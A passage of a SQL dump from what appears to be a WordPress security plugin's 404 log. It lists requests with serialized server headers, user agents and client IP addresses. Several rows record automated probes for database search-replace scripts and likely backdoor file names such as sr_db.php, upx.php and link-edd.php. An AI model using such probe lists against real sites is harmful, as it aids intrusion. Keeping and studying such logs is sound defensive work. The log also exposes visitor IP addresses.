Firefox/67.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632057525.66703891754150390625;s:12:\"REQUEST_TIME\";i:1632057525;}}','notice','2021-09-19 13:18:47','2021-09-19 13:18:45',72690192,72791008,'https://zphiblgz.org/templates/protostar/index.php',1,0,'185.191.34.215'),(97241,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:21:\"http://simplesite.com\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632057820.883696079254150390625;s:12:\"REQUEST_TIME\";i:1632057820;}}','notice','2021-09-19 13:23:42','2021-09-19 13:23:41',72666808,72766840,'http://zphiblgz.org/wordpress/wp-content/plugins/fighter/upx.php',1,0,'43.128.57.178'),(97242,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:21:\"http://simplesite.com\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632060539.2146759033203125;s:12:\"REQUEST_TIME\";i:1632060539;}}','notice','2021-09-19 14:09:00','2021-09-19 14:08:59',72348968,72449040,'http://zphiblgz.org/wordpress/wp-admin/link-edd.php',1,0,'144.34.166.150'),(97243,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:16:\"application/json\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:14:\"ALittle Client\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632060537.3731911182403564453125;s:12:\"REQUEST_TIME\";i:1632060537;}}','notice','2021-09-19 14:09:00','2021-09-19 14:08:57',72604904,72688656,'http://zphiblgz.org/language/index.html',1,0,'23.228.109.147'),(97244,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:21:\"http://simplesite.com\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632060543.7062199115753173828125;s:12:\"REQUEST_TIME\";i:1632060543;}}','notice','2021-09-19 14:09:05','2021-09-19 14:09:03',72641936,72742008,'http://zphiblgz.org/wordpress/wp-admin/link-edd.php',1,0,'144.34.166.150'),(97245,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632061406.9131710529327392578125;s:12:\"REQUEST_TIME\";i:1632061406;}}','notice','2021-09-19 14:23:28','2021-09-19 14:23:27',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'46.161.11.21'),(97246,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:130:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632062120.6848309040069580078125;s:12:\"REQUEST_TIME\";i:1632062120;}}','notice','2021-09-19 14:35:22','2021-09-19 14:35:20',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'46.161.11.21'),(97247,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:11:\"HTTP_ACCEPT\";s:47:\"text/html,application/xhtml+xml,application/xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:68:\"Buck/2.2; (+https://app.hypefactors.com/media-monitoring/about.html)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632067718.167314052581787109375;s:12:\"REQUEST_TIME\";i:1632067718;}}','notice','2021-09-19 16:08:40','2021-09-19 16:08:38',72605384,72689152,'http://zphiblgz.org/application',1,0,'34.201.31.249'),(97248,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"11\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632076799.4009969234466552734375;s:12:\"REQUEST_TIME\";i:1632076799;}}','notice','2021-09-19 18:40:00','2021-09-19 18:39:59',72419048,72438152,'https://zphiblgz.org/config.php',1,0,'185.191.34.215'),(97249,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"11\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632076799.3469409942626953125;s:12:\"REQUEST_TIME\";i:1632076799;}}','notice','2021-09-19 18:40:01','2021-09-19 18:39:59',72646432,72731072,'https://zphiblgz.org/config.php',1,0,'185.191.34.215'),(97250,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:9:\"TE, close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:7:\"HTTP_TE\";s:18:\"deflate,gzip;q=0.3\";s:15:\"HTTP_USER_AGENT\";s:35:\"SiteLockSpider [en] (WinNT; I ;Nav)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632078280.7260189056396484375;s:12:\"REQUEST_TIME\";i:1632078280;}}','notice','2021-09-19 19:04:42','2021-09-19 19:04:40',72612784,72695720,'https://zphiblgz.org/th1s_1s_a_4o4.html',1,0,'184.154.139.3'),(97251,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:15:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:7:\"deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:35:\"ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632089440.5569779872894287109375;s:12:\"REQUEST_TIME\";i:1632089440;}}','notice','2021-09-19 22:10:43','2021-09-19 22:10:40',72710208,72793944,'http://zphiblgz.org/scholarship/application/',1,0,'80.253.235.74'),(97252,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632093572.9786450862884521484375;s:12:\"REQUEST_TIME\";i:1632093572;}}','notice','2021-09-19 23:19:34','2021-09-19 23:19:33',72623584,72707320,'http://zphiblgz.org/scholarship/application/',1,0,'176.114.190.126'),(97253,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.49\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632094040.133739948272705078125;s:12:\"REQUEST_TIME\";i:1632094040;}}','notice','2021-09-19 23:27:22','2021-09-19 23:27:20',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'45.152.119.147'),(97254,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632094139.5738780498504638671875;s:12:\"REQUEST_TIME\";i:1632094139;}}','notice','2021-09-19 23:29:01','2021-09-19 23:28:59',72168848,72256112,'https://zphiblgz.org/event/youth-open-house/',1,0,'207.46.13.170'),(97201,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:137:\"Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631943974.446031093597412109375;s:12:\"REQUEST_TIME\";i:1631943974;}}','notice','2021-09-18 05:46:16','2021-09-18 05:46:14',72606200,72690072,'http://zphiblgz.org/sr_db.php',1,0,'163.172.213.212'),(97202,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:137:\"Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631943981.2823870182037353515625;s:12:\"REQUEST_TIME\";i:1631943981;}}','notice','2021-09-18 05:46:23','2021-09-18 05:46:21',72604768,72688536,'http://zphiblgz.org/srdb2.php',1,0,'163.172.213.212'),(97203,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:137:\"Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631943987.8222820758819580078125;s:12:\"REQUEST_TIME\";i:1631943987;}}','notice','2021-09-18 05:46:29','2021-09-18 05:46:28',72606256,72690120,'http://zphiblgz.org/replace-db.php',1,0,'163.172.213.212'),(97204,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:130:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631945596.6414349079132080078125;s:12:\"REQUEST_TIME\";i:1631945596;}}','notice','2021-09-18 06:13:18','2021-09-18 06:13:16',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'209.54.104.126'),(97205,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"11\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631948203.468719005584716796875;s:12:\"REQUEST_TIME\";i:1631948203;}}','notice','2021-09-18 06:56:45','2021-09-18 06:56:43',72653096,72737720,'https://zphiblgz.org/cache/search.php',1,0,'185.191.34.215'),(97206,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:21:\"http://simplesite.com\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631952832.82250499725341796875;s:12:\"REQUEST_TIME\";i:1631952832;}}','notice','2021-09-18 08:13:54','2021-09-18 08:13:53',72623272,72707024,'http://zphiblgz.org/wordpress/doc.php',1,0,'45.124.84.189'),(97207,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:21:\"http://simplesite.com\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631953447.9725449085235595703125;s:12:\"REQUEST_TIME\";i:1631953447;}}','notice','2021-09-18 08:24:10','2021-09-18 08:24:08',72666696,72766744,'http://zphiblgz.org/wordpress/wp-admin/network/network.php',1,0,'115.126.6.208'),(97208,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:21:\"http://simplesite.com\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631953453.601460933685302734375;s:12:\"REQUEST_TIME\";i:1631953453;}}','notice','2021-09-18 08:24:15','2021-09-18 08:24:13',72666696,72766744,'http://zphiblgz.org/wordpress/wp-admin/network/network.php',1,0,'115.126.6.208'),(97209,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/signed-exchange;v=b3,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631956456.658543109893798828125;s:12:\"REQUEST_TIME\";i:1631956456;}}','notice','2021-09-18 09:14:18','2021-09-18 09:14:16',72181744,72265784,'http://zphiblgz.org/tag/%E8%B2%AB%E3%81%8B%E3%82%8C%E3%81%9F%E5%BF%83%E8%87%93%E3%81%AE%E5%91%AA%E3%81%84/',1,0,'66.249.65.167'),(97210,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:21:\"http://simplesite.com\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 